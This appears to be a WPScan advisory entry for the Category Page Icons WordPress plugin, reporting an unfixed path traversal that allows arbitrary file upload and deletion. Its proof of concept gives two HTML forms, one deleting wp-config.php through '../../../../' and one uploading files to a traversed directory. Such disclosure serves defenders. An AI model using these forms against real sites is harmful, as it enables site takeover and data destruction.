Category Page Icons <= 0.9.1 - Arbitrary File Upload/Deletion via Path Traversal



Description
v0.9.2 added a check to not allow direct access to the affected file. However the path traversal was not fixed

Plugin has been closed from repository.
Proof of Concept
<form action="https://example.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="POST">
<input type="hidden" name="ajax_action" value="delete-image">
<input type="text" name="file_name_dir" value = "../../../../">
<input type="text" name="file_name_org" value = "wp-config.php">
<input type="submit" value="Delete it">
</form>

<form action="https://example.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="POST" enctype="multipart/form-data">
Choose File to upload : <input type="file" name="wpdev-async-upload"><br />
Directory : <input type="text" name="dir_icons" value="../../../../"><br />
<input type="submit" value="Upload">

Affects Plugin

no known fix
- plugin closed

References

URL https://www.exploit-database.net/?id=22413

Classification

Type MULTI

Miscellaneous

Views 763
Verified No
WPVDB ID 10129

Timeline

Publicly Published 2014-09-29 (almost 6 years ago)
Added 2020-03-13 (4 months ago)
Last Updated 2020-03-14 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin